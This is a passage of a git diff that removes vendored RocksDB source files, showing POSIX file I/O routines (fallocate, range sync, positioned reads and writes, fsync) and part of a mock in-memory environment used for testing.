-  TEST_KILL_RANDOM("PosixWritableFile::Allocate:0", rocksdb_kill_odds);
-  IOSTATS_TIMER_GUARD(allocate_nanos);
-  int alloc_status = 0;
-  if (allow_fallocate_) {
-    alloc_status = fallocate(
-        fd_, fallocate_with_keep_size_ ? FALLOC_FL_KEEP_SIZE : 0,
-        static_cast<off_t>(offset), static_cast<off_t>(len));
-  }
-  if (alloc_status == 0) {
-    return Status::OK();
-  } else {
-    return IOError(
-        "While fallocate offset " + ToString(offset) + " len " + ToString(len),
-        filename_, errno);
-  }
-}
-#endif
-
-#ifdef ROCKSDB_RANGESYNC_PRESENT
-Status PosixWritableFile::RangeSync(uint64_t offset, uint64_t nbytes) {
-  assert(offset <= std::numeric_limits<off_t>::max());
-  assert(nbytes <= std::numeric_limits<off_t>::max());
-  if (sync_file_range(fd_, static_cast<off_t>(offset),
-      static_cast<off_t>(nbytes), SYNC_FILE_RANGE_WRITE) == 0) {
-    return Status::OK();
-  } else {
-    return IOError("While sync_file_range offset " + ToString(offset) +
-                       " bytes " + ToString(nbytes),
-                   filename_, errno);
-  }
-}
-#endif
-
-#ifdef OS_LINUX
-size_t PosixWritableFile::GetUniqueId(char* id, size_t max_size) const {
-  return PosixHelper::GetUniqueIdFromFile(fd_, id, max_size);
-}
-#endif
-
-/*
- * PosixRandomRWFile
- */
-
-PosixRandomRWFile::PosixRandomRWFile(const std::string& fname, int fd,
-                                     const EnvOptions& options)
-    : filename_(fname), fd_(fd) {}
-
-PosixRandomRWFile::~PosixRandomRWFile() {
-  if (fd_ >= 0) {
-    Close();
-  }
-}
-
-Status PosixRandomRWFile::Write(uint64_t offset, const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  while (left != 0) {
-    ssize_t done = pwrite(fd_, src, left, offset);
-    if (done < 0) {
-      // error while writing to file
-      if (errno == EINTR) {
-        // write was interrupted, try again.
-        continue;
-      }
-      return IOError(
-          "While write random read/write file at offset " + ToString(offset),
-          filename_, errno);
-    }
-
-    // Wrote `done` bytes
-    left -= done;
-    offset += done;
-    src += done;
-  }
-
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Read(uint64_t offset, size_t n, Slice* result,
-                               char* scratch) const {
-  size_t left = n;
-  char* ptr = scratch;
-  while (left > 0) {
-    ssize_t done = pread(fd_, ptr, left, offset);
-    if (done < 0) {
-      // error while reading from file
-      if (errno == EINTR) {
-        // read was interrupted, try again.
-        continue;
-      }
-      return IOError("While reading random read/write file offset " +
-                         ToString(offset) + " len " + ToString(n),
-                     filename_, errno);
-    } else if (done == 0) {
-      // Nothing more to read
-      break;
-    }
-
-    // Read `done` bytes
-    ptr += done;
-    offset += done;
-    left -= done;
-  }
-
-  *result = Slice(scratch, n - left);
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Flush() { return Status::OK(); }
-
-Status PosixRandomRWFile::Sync() {
-  if (fdatasync(fd_) < 0) {
-    return IOError("While fdatasync random read/write file", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Fsync() {
-  if (fsync(fd_) < 0) {
-    return IOError("While fsync random read/write file", filename_, errno);
-  }
-  return Status::OK();
-}
-
-Status PosixRandomRWFile::Close() {
-  if (close(fd_) < 0) {
-    return IOError("While close random read/write file", filename_, errno);
-  }
-  fd_ = -1;
-  return Status::OK();
-}
-
-/*
- * PosixDirectory
- */
-
-PosixDirectory::~PosixDirectory() { close(fd_); }
-
-Status PosixDirectory::Fsync() {
-#ifndef OS_AIX
-  if (fsync(fd_) == -1) {
-    return IOError("While fsync", "a directory", errno);
-  }
-#endif
-  return Status::OK();
-}
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/env/io_posix.h b/thirdparty/rocksdb/env/io_posix.h
deleted file mode 100644
index 69c9843..0000000
--- a/thirdparty/rocksdb/env/io_posix.h
+++ /dev/null
@@ -1,248 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <errno.h>
-#include <unistd.h>
-#include <atomic>
-#include <string>
-#include "rocksdb/env.h"
-
-// For non linux platform, the following macros are used only as place
-// holder.
-#if !(defined OS_LINUX) && !(defined CYGWIN) && !(defined OS_AIX)
-#define POSIX_FADV_NORMAL 0     /* [MC1] no further special treatment */
-#define POSIX_FADV_RANDOM 1     /* [MC1] expect random page refs */
-#define POSIX_FADV_SEQUENTIAL 2 /* [MC1] expect sequential page refs */
-#define POSIX_FADV_WILLNEED 3   /* [MC1] will need these pages */
-#define POSIX_FADV_DONTNEED 4   /* [MC1] dont need these pages */
-#endif
-
-namespace rocksdb {
-static std::string IOErrorMsg(const std::string& context,
-                              const std::string& file_name) {
-  if (file_name.empty()) {
-    return context;
-  }
-  return context + ": " + file_name;
-}
-
-// file_name can be left empty if it is not unkown.
-static Status IOError(const std::string& context, const std::string& file_name,
-                      int err_number) {
-  switch (err_number) {
-  case ENOSPC:
-    return Status::NoSpace(IOErrorMsg(context, file_name),
-                           strerror(err_number));
-  case ESTALE:
-    return Status::IOError(Status::kStaleFile);
-  default:
-    return Status::IOError(IOErrorMsg(context, file_name),
-                           strerror(err_number));
-  }
-}
-
-class PosixHelper {
- public:
-  static size_t GetUniqueIdFromFile(int fd, char* id, size_t max_size);
-};
-
-class PosixSequentialFile : public SequentialFile {
- private:
-  std::string filename_;
-  FILE* file_;
-  int fd_;
-  bool use_direct_io_;
-  size_t logical_sector_size_;
-
- public:
-  PosixSequentialFile(const std::string& fname, FILE* file, int fd,
-                      const EnvOptions& options);
-  virtual ~PosixSequentialFile();
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override;
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-                                char* scratch) override;
-  virtual Status Skip(uint64_t n) override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-};
-
-class PosixRandomAccessFile : public RandomAccessFile {
- protected:
-  std::string filename_;
-  int fd_;
-  bool use_direct_io_;
-  size_t logical_sector_size_;
-
- public:
-  PosixRandomAccessFile(const std::string& fname, int fd,
-                        const EnvOptions& options);
-  virtual ~PosixRandomAccessFile();
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Prefetch(uint64_t offset, size_t n) override;
-
-#if defined(OS_LINUX) || defined(OS_MACOSX) || defined(OS_AIX)
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-#endif
-  virtual void Hint(AccessPattern pattern) override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-};
-
-class PosixWritableFile : public WritableFile {
- protected:
-  const std::string filename_;
-  const bool use_direct_io_;
-  int fd_;
-  uint64_t filesize_;
-  size_t logical_sector_size_;
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  bool allow_fallocate_;
-  bool fallocate_with_keep_size_;
-#endif
-
- public:
-  explicit PosixWritableFile(const std::string& fname, int fd,
-                             const EnvOptions& options);
-  virtual ~PosixWritableFile();
-
-  // Need to implement this so the file is truncated correctly
-  // with direct I/O
-  virtual Status Truncate(uint64_t size) override;
-  virtual Status Close() override;
-  virtual Status Append(const Slice& data) override;
-  virtual Status PositionedAppend(const Slice& data, uint64_t offset) override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual bool IsSyncThreadSafe() const override;
-  virtual bool use_direct_io() const override { return use_direct_io_; }
-  virtual uint64_t GetFileSize() override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-  virtual size_t GetRequiredBufferAlignment() const override {
-    return logical_sector_size_;
-  }
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-#endif
-#ifdef ROCKSDB_RANGESYNC_PRESENT
-  virtual Status RangeSync(uint64_t offset, uint64_t nbytes) override;
-#endif
-#ifdef OS_LINUX
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-#endif
-};
-
-// mmap() based random-access
-class PosixMmapReadableFile : public RandomAccessFile {
- private:
-  int fd_;
-  std::string filename_;
-  void* mmapped_region_;
-  size_t length_;
-
- public:
-  PosixMmapReadableFile(const int fd, const std::string& fname, void* base,
-                        size_t length, const EnvOptions& options);
-  virtual ~PosixMmapReadableFile();
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-};
-
-class PosixMmapFile : public WritableFile {
- private:
-  std::string filename_;
-  int fd_;
-  size_t page_size_;
-  size_t map_size_;       // How much extra memory to map at a time
-  char* base_;            // The mapped region
-  char* limit_;           // Limit of the mapped region
-  char* dst_;             // Where to write next  (in range [base_,limit_])
-  char* last_sync_;       // Where have we synced up to
-  uint64_t file_offset_;  // Offset of base_ in file
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  bool allow_fallocate_;  // If false, fallocate calls are bypassed
-  bool fallocate_with_keep_size_;
-#endif
-
-  // Roundup x to a multiple of y
-  static size_t Roundup(size_t x, size_t y) { return ((x + y - 1) / y) * y; }
-
-  size_t TruncateToPageBoundary(size_t s) {
-    s -= (s & (page_size_ - 1));
-    assert((s % page_size_) == 0);
-    return s;
-  }
-
-  Status MapNewRegion();
-  Status UnmapCurrentRegion();
-  Status Msync();
-
- public:
-  PosixMmapFile(const std::string& fname, int fd, size_t page_size,
-                const EnvOptions& options);
-  ~PosixMmapFile();
-
-  // Means Close() will properly take care of truncate
-  // and it does not need any additional information
-  virtual Status Truncate(uint64_t size) override { return Status::OK(); }
-  virtual Status Close() override;
-  virtual Status Append(const Slice& data) override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual uint64_t GetFileSize() override;
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-#endif
-};
-
-class PosixRandomRWFile : public RandomRWFile {
- public:
-  explicit PosixRandomRWFile(const std::string& fname, int fd,
-                             const EnvOptions& options);
-  virtual ~PosixRandomRWFile();
-
-  virtual Status Write(uint64_t offset, const Slice& data) override;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual Status Fsync() override;
-  virtual Status Close() override;
-
- private:
-  const std::string filename_;
-  int fd_;
-};
-
-class PosixDirectory : public Directory {
- public:
-  explicit PosixDirectory(int fd) : fd_(fd) {}
-  ~PosixDirectory();
-  virtual Status Fsync() override;
-
- private:
-  int fd_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/mock_env.cc b/thirdparty/rocksdb/env/mock_env.cc
deleted file mode 100644
index 669011c..0000000
--- a/thirdparty/rocksdb/env/mock_env.cc
+++ /dev/null
@@ -1,799 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "env/mock_env.h"
-#include <algorithm>
-#include <chrono>
-#include "port/sys_time.h"
-#include "util/cast_util.h"
-#include "util/murmurhash.h"
-#include "util/random.h"
-#include "util/rate_limiter.h"
-
-namespace rocksdb {
-
-class MemFile {
- public:
-  explicit MemFile(Env* env, const std::string& fn, bool _is_lock_file = false)
-      : env_(env),
-        fn_(fn),
-        refs_(0),
-        is_lock_file_(_is_lock_file),
-        locked_(false),
-        size_(0),
-        modified_time_(Now()),
-        rnd_(static_cast<uint32_t>(
-            MurmurHash(fn.data(), static_cast<int>(fn.size()), 0))),
-        fsynced_bytes_(0) {}
-
-  void Ref() {
-    MutexLock lock(&mutex_);
-    ++refs_;
-  }
-
-  bool is_lock_file() const { return is_lock_file_; }
-
-  bool Lock() {
-    assert(is_lock_file_);
-    MutexLock lock(&mutex_);
-    if (locked_) {
-      return false;
-    } else {
-      locked_ = true;
-      return true;
-    }
-  }
-
-  void Unlock() {
-    assert(is_lock_file_);
-    MutexLock lock(&mutex_);
-    locked_ = false;
-  }
-
-  void Unref() {
-    bool do_delete = false;
-    {
-      MutexLock lock(&mutex_);
-      --refs_;
-      assert(refs_ >= 0);
-      if (refs_ <= 0) {
-        do_delete = true;
-      }
-    }
-
-    if (do_delete) {
-      delete this;
-    }
-  }
-
-  uint64_t Size() const {
-    return size_;
-  }
-
-  void Truncate(size_t size) {
-    MutexLock lock(&mutex_);
-    if (size < size_) {
-      data_.resize(size);
-      size_ = size;
-    }
-  }
-
-  void CorruptBuffer() {
-    if (fsynced_bytes_ >= size_) {
-      return;
-    }
-    uint64_t buffered_bytes = size_ - fsynced_bytes_;
-    uint64_t start =
-        fsynced_bytes_ + rnd_.Uniform(static_cast<int>(buffered_bytes));
-    uint64_t end = std::min(start + 512, size_.load());
-    MutexLock lock(&mutex_);
-    for (uint64_t pos = start; pos < end; ++pos) {
-      data_[pos] = static_cast<char>(rnd_.Uniform(256));
-    }
-  }
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    MutexLock lock(&mutex_);
-    const uint64_t available = Size() - std::min(Size(), offset);
-    if (n > available) {
-      n = available;
-    }
-    if (n == 0) {
-      *result = Slice();
-      return Status::OK();
-    }
-    if (scratch) {
-      memcpy(scratch, &(data_[offset]), n);
-      *result = Slice(scratch, n);
-    } else {
-      *result = Slice(&(data_[offset]), n);
-    }
-    return Status::OK();
-  }
-
-  Status Write(uint64_t offset, const Slice& data) {
-    MutexLock lock(&mutex_);
-    if (offset + data.size() > data_.size()) {
-      data_.resize(offset + data.size());
-    }
-    data_.replace(offset, data.size(), data.data(), data.size());
-    size_ = data_.size();
-    modified_time_ = Now();
-    return Status::OK();
-  }
-
-  Status Append(const Slice& data) {
-    MutexLock lock(&mutex_);
-    data_.append(data.data(), data.size());
-    size_ = data_.size();
-    modified_time_ = Now();
-    return Status::OK();
-  }
-
-  Status Fsync() {
-    fsynced_bytes_ = size_.load();
-    return Status::OK();
-  }
-
-  uint64_t ModifiedTime() const {
-    return modified_time_;
-  }
-
- private:
-  uint64_t Now() {
-    int64_t unix_time = 0;
-    auto s = env_->GetCurrentTime(&unix_time);
-    assert(s.ok());
-    return static_cast<uint64_t>(unix_time);
-  }
-
-  // Private since only Unref() should be used to delete it.
-  ~MemFile() {
-    assert(refs_ == 0);
-  }
-
-  // No copying allowed.
-  MemFile(const MemFile&);
-  void operator=(const MemFile&);
-
-  Env* env_;
-  const std::string fn_;
-  mutable port::Mutex mutex_;
-  int refs_;
-  bool is_lock_file_;
-  bool locked_;
-
-  // Data written into this file, all bytes before fsynced_bytes are
-  // persistent.
-  std::string data_;
-  std::atomic<uint64_t> size_;
-  std::atomic<uint64_t> modified_time_;
-
-  Random rnd_;
-  std::atomic<uint64_t> fsynced_bytes_;
-};
-
-namespace {
-
-class MockSequentialFile : public SequentialFile {
- public:
-  explicit MockSequentialFile(MemFile* file) : file_(file), pos_(0) {
-    file_->Ref();
-  }
-
-  ~MockSequentialFile() {
-    file_->Unref();
-  }
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override {
-    Status s = file_->Read(pos_, n, result, scratch);
-    if (s.ok()) {
-      pos_ += result->size();
-    }
-    return s;
-  }
-
-  virtual Status Skip(uint64_t n) override {
-    if (pos_ > file_->Size()) {
-      return Status::IOError("pos_ > file_->Size()");
-    }
-    const size_t available = file_->Size() - pos_;
-    if (n > available) {
-      n = available;
-    }
-    pos_ += n;
-    return Status::OK();
-  }
-
- private:
-  MemFile* file_;
-  size_t pos_;
-};
-
-class MockRandomAccessFile : public RandomAccessFile {
- public:
-  explicit MockRandomAccessFile(MemFile* file) : file_(file) {
-    file_->Ref();
-  }
-
-  ~MockRandomAccessFile() {
-    file_->Unref();
-  }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-    return file_->Read(offset, n, result, scratch);
-  }
-
- private:
-  MemFile* file_;
-};
-
-class MockRandomRWFile : public RandomRWFile {
- public:
-  explicit MockRandomRWFile(MemFile* file) : file_(file) { file_->Ref(); }
-
-  ~MockRandomRWFile() { file_->Unref(); }
-
-  virtual Status Write(uint64_t offset, const Slice& data) override {
-    return file_->Write(offset, data);
-  }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-    return file_->Read(offset, n, result, scratch);
-  }
-
-  virtual Status Close() override { return file_->Fsync(); }
-
-  virtual Status Flush() override { return Status::OK(); }
-
-  virtual Status Sync() override { return file_->Fsync(); }
-
- private:
-  MemFile* file_;
-};
-
-class MockWritableFile : public WritableFile {
- public:
-  MockWritableFile(MemFile* file, RateLimiter* rate_limiter)
-    : file_(file),
-      rate_limiter_(rate_limiter) {
-    file_->Ref();
-  }
-
-  ~MockWritableFile() {
-    file_->Unref();
-  }
-
-  virtual Status Append(const Slice& data) override {
-    uint64_t bytes_written = 0;
-    while (bytes_written < data.size()) {
-      auto bytes = RequestToken(data.size() - bytes_written);
-      Status s = file_->Append(Slice(data.data() + bytes_written, bytes));
-      if (!s.ok()) {
-        return s;
-      }
-      bytes_written += bytes;
-    }
-    return Status::OK();
-  }
-  virtual Status Truncate(uint64_t size) override {
-    file_->Truncate(size);
-    return Status::OK();
-  }
-  virtual Status Close() override { return file_->Fsync(); }
-
-  virtual Status Flush() override { return Status::OK(); }
-
-  virtual Status Sync() override { return file_->Fsync(); }
-
-  virtual uint64_t GetFileSize() override { return file_->Size(); }
-
- private:
-  inline size_t RequestToken(size_t bytes) {
-    if (rate_limiter_ && io_priority_ < Env::IO_TOTAL) {
-      bytes = std::min(bytes,
-          static_cast<size_t>(rate_limiter_->GetSingleBurstBytes()));
-      rate_limiter_->Request(bytes, io_priority_);
-    }
-    return bytes;
-  }
-
-  MemFile* file_;
-  RateLimiter* rate_limiter_;
-};
-
-class MockEnvDirectory : public Directory {
- public:
-  virtual Status Fsync() override { return Status::OK(); }
-};
-
-class MockEnvFileLock : public FileLock {
- public:
-  explicit MockEnvFileLock(const std::string& fname)
-    : fname_(fname) {}
-
-  std::string FileName() const {
-    return fname_;
-  }
-
- private:
-  const std::string fname_;
-};
-
-class TestMemLogger : public Logger {
- private:
-  std::unique_ptr<WritableFile> file_;
-  std::atomic_size_t log_size_;
-  static const uint64_t flush_every_seconds_ = 5;
-  std::atomic_uint_fast64_t last_flush_micros_;
-  Env* env_;
-  bool flush_pending_;
-
- public:
-  TestMemLogger(std::unique_ptr<WritableFile> f, Env* env,
-                const InfoLogLevel log_level = InfoLogLevel::ERROR_LEVEL)
-      : Logger(log_level),
-        file_(std::move(f)),
-        log_size_(0),
-        last_flush_micros_(0),
-        env_(env),
-        flush_pending_(false) {}
-  virtual ~TestMemLogger() {
-  }
-
-  virtual void Flush() override {
-    if (flush_pending_) {
-      flush_pending_ = false;
-    }
-    last_flush_micros_ = env_->NowMicros();
-  }
-
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    // We try twice: the first time with a fixed-size stack allocated buffer,
-    // and the second time with a much larger dynamically allocated buffer.
-    char buffer[500];
-    for (int iter = 0; iter < 2; iter++) {
-      char* base;
-      int bufsize;
-      if (iter == 0) {
-        bufsize = sizeof(buffer);
-        base = buffer;
-      } else {
-        bufsize = 30000;
-        base = new char[bufsize];
-      }
-      char* p = base;
-      char* limit = base + bufsize;
-
-      struct timeval now_tv;
-      gettimeofday(&now_tv, nullptr);
-      const time_t seconds = now_tv.tv_sec;
-      struct tm t;
-      memset(&t, 0, sizeof(t));
-      auto ret __attribute__((__unused__)) = localtime_r(&seconds, &t);
-      assert(ret);
-      p += snprintf(p, limit - p,
-                    "%04d/%02d/%02d-%02d:%02d:%02d.%06d ",
-                    t.tm_year + 1900,
-                    t.tm_mon + 1,
-                    t.tm_mday,
-                    t.tm_hour,
-                    t.tm_min,
-                    t.tm_sec,
-                    static_cast<int>(now_tv.tv_usec));
-
-      // Print the message
-      if (p < limit) {
-        va_list backup_ap;
-        va_copy(backup_ap, ap);
-        p += vsnprintf(p, limit - p, format, backup_ap);
-        va_end(backup_ap);
-      }
-
-      // Truncate to available space if necessary
-      if (p >= limit) {
-        if (iter == 0) {
-          continue;       // Try again with larger buffer
-        } else {
-          p = limit - 1;
-        }
-      }
-
-      // Add newline if necessary
-      if (p == base || p[-1] != '\n') {
-        *p++ = '\n';
-      }
-
-      assert(p <= limit);
-      const size_t write_size = p - base;
-
-      file_->Append(Slice(base, write_size));
-      flush_pending_ = true;
-      log_size_ += write_size;
-      uint64_t now_micros = static_cast<uint64_t>(now_tv.tv_sec) * 1000000 +
-        now_tv.tv_usec;
-      if (now_micros - last_flush_micros_ >= flush_every_seconds_ * 1000000) {
-        flush_pending_ = false;
-        last_flush_micros_ = now_micros;
-      }
-      if (base != buffer) {
-        delete[] base;
-      }
-      break;
-    }
-  }
-  size_t GetLogFileSize() const override { return log_size_; }
-};
-
-}  // Anonymous namespace
-
-MockEnv::MockEnv(Env* base_env) : EnvWrapper(base_env), fake_sleep_micros_(0) {}
-
-MockEnv::~MockEnv() {
-  for (FileSystem::iterator i = file_map_.begin(); i != file_map_.end(); ++i) {
-    i->second->Unref();
-  }
-}
-
-  // Partial implementation of the Env interface.
-Status MockEnv::NewSequentialFile(const std::string& fname,
-                                     unique_ptr<SequentialFile>* result,
-                                     const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockSequentialFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::NewRandomAccessFile(const std::string& fname,
-                                       unique_ptr<RandomAccessFile>* result,
-                                       const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockRandomAccessFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::NewRandomRWFile(const std::string& fname,
-                                unique_ptr<RandomRWFile>* result,
-                                const EnvOptions& soptions) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    *result = NULL;
-    return Status::IOError(fn, "File not found");
-  }
-  auto* f = file_map_[fn];
-  if (f->is_lock_file()) {
-    return Status::InvalidArgument(fn, "Cannot open a lock file.");
-  }
-  result->reset(new MockRandomRWFile(f));
-  return Status::OK();
-}
-
-Status MockEnv::ReuseWritableFile(const std::string& fname,
-                                  const std::string& old_fname,
-                                  unique_ptr<WritableFile>* result,
-                                  const EnvOptions& options) {
-  auto s = RenameFile(old_fname, fname);
-  if (!s.ok()) {
-    return s;
-  }
-  result->reset();
-  return NewWritableFile(fname, result, options);
-}
-
-Status MockEnv::NewWritableFile(const std::string& fname,
-                                unique_ptr<WritableFile>* result,
-                                const EnvOptions& env_options) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) != file_map_.end()) {
-    DeleteFileInternal(fn);
-  }
-  MemFile* file = new MemFile(this, fn, false);
-  file->Ref();
-  file_map_[fn] = file;
-
-  result->reset(new MockWritableFile(file, env_options.rate_limiter));
-  return Status::OK();
-}
-
-Status MockEnv::NewDirectory(const std::string& name,
-                                unique_ptr<Directory>* result) {
-  result->reset(new MockEnvDirectory());
-  return Status::OK();
-}
-
-Status MockEnv::FileExists(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) != file_map_.end()) {
-    // File exists
-    return Status::OK();
-  }
-  // Now also check if fn exists as a dir
-  for (const auto& iter : file_map_) {
-    const std::string& filename = iter.first;
-    if (filename.size() >= fn.size() + 1 &&
-        filename[fn.size()] == '/' &&
-        Slice(filename).starts_with(Slice(fn))) {
-      return Status::OK();
-    }
-  }
-  return Status::NotFound();
-}
-
-Status MockEnv::GetChildren(const std::string& dir,
-                               std::vector<std::string>* result) {
-  auto d = NormalizePath(dir);
-  bool found_dir = false;
-  {
-    MutexLock lock(&mutex_);
-    result->clear();
-    for (const auto& iter : file_map_) {
-      const std::string& filename = iter.first;
-
-      if (filename == d) {
-        found_dir = true;
-      } else if (filename.size() >= d.size() + 1 && filename[d.size()] == '/' &&
-                 Slice(filename).starts_with(Slice(d))) {
-        found_dir = true;
-        size_t next_slash = filename.find('/', d.size() + 1);
-        if (next_slash != std::string::npos) {
-          result->push_back(filename.substr(
-                d.size() + 1, next_slash - d.size() - 1));
-        } else {
-          result->push_back(filename.substr(d.size() + 1));
-        }
-      }
-    }
-  }
-  result->erase(std::unique(result->begin(), result->end()), result->end());
-  return found_dir ? Status::OK() : Status::NotFound();
-}
-
-void MockEnv::DeleteFileInternal(const std::string& fname) {
-  assert(fname == NormalizePath(fname));
-  const auto& pair = file_map_.find(fname);
-  if (pair != file_map_.end()) {
-    pair->second->Unref();
-    file_map_.erase(fname);
-  }
-}
-
-Status MockEnv::DeleteFile(const std::string& fname) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(fn) == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-
-  DeleteFileInternal(fn);
-  return Status::OK();
-}
-
-Status MockEnv::CreateDir(const std::string& dirname) {
-  auto dn = NormalizePath(dirname);
-  if (file_map_.find(dn) == file_map_.end()) {
-    MemFile* file = new MemFile(this, dn, false);
-    file->Ref();
-    file_map_[dn] = file;
-  } else {
-    return Status::IOError();
-  }
-  return Status::OK();
-}
-
-Status MockEnv::CreateDirIfMissing(const std::string& dirname) {
-  CreateDir(dirname);
-  return Status::OK();
-}
-
-Status MockEnv::DeleteDir(const std::string& dirname) {
-  return DeleteFile(dirname);
-}
-
-Status MockEnv::GetFileSize(const std::string& fname, uint64_t* file_size) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-
-  *file_size = iter->second->Size();
-  return Status::OK();
-}
-
-Status MockEnv::GetFileModificationTime(const std::string& fname,
-                                           uint64_t* time) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  if (iter == file_map_.end()) {
-    return Status::IOError(fn, "File not found");
-  }
-  *time = iter->second->ModifiedTime();
-  return Status::OK();
-}
-
-Status MockEnv::RenameFile(const std::string& src, const std::string& dest) {
-  auto s = NormalizePath(src);
-  auto t = NormalizePath(dest);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(s) == file_map_.end()) {
-    return Status::IOError(s, "File not found");
-  }
-
-  DeleteFileInternal(t);
-  file_map_[t] = file_map_[s];
-  file_map_.erase(s);
-  return Status::OK();
-}
-
-Status MockEnv::LinkFile(const std::string& src, const std::string& dest) {
-  auto s = NormalizePath(src);
-  auto t = NormalizePath(dest);
-  MutexLock lock(&mutex_);
-  if (file_map_.find(s) == file_map_.end()) {
-    return Status::IOError(s, "File not found");
-  }
-
-  DeleteFileInternal(t);
-  file_map_[t] = file_map_[s];
-  file_map_[t]->Ref();  // Otherwise it might get deleted when noone uses s
-  return Status::OK();
-}
-
-Status MockEnv::NewLogger(const std::string& fname,
-                             shared_ptr<Logger>* result) {
-  auto fn = NormalizePath(fname);
-  MutexLock lock(&mutex_);
-  auto iter = file_map_.find(fn);
-  MemFile* file = nullptr;
-  if (iter == file_map_.end()) {
-    file = new MemFile(this, fn, false);
-    file->Ref();
-    file_map_[fn] = file;
-  } else {
-    file = iter->second;
-  }
-  std::unique_ptr<WritableFile> f(new MockWritableFile(file, nullptr));
-  result->reset(new TestMemLogger(std::move(f), this));
-  return Status::OK();
-}
-
-Status MockEnv::LockFile(const std::string& fname, FileLock** flock) {
-  auto fn = NormalizePath(fname);
-  {
-    MutexLock lock(&mutex_);
-    if (file_map_.find(fn) != file_map_.end()) {
-      if (!file_map_[fn]->is_lock_file()) {
-        return Status::InvalidArgument(fname, "Not a lock file.");
-      }
-      if (!file_map_[fn]->Lock()) {
-        return Status::IOError(fn, "Lock is already held.");
-      }
-    } else {
-      auto* file = new MemFile(this, fn, true);
-      file->Ref();
-      file->Lock();
-      file_map_[fn] = file;
-    }
-  }
-  *flock = new MockEnvFileLock(fn);
-  return Status::OK();
-}
-
-Status MockEnv::UnlockFile(FileLock* flock) {
-  std::string fn =
-      static_cast_with_check<MockEnvFileLock, FileLock>(flock)->FileName();
-  {
-    MutexLock lock(&mutex_);
-    if (file_map_.find(fn) != file_map_.end()) {
-      if (!file_map_[fn]->is_lock_file()) {
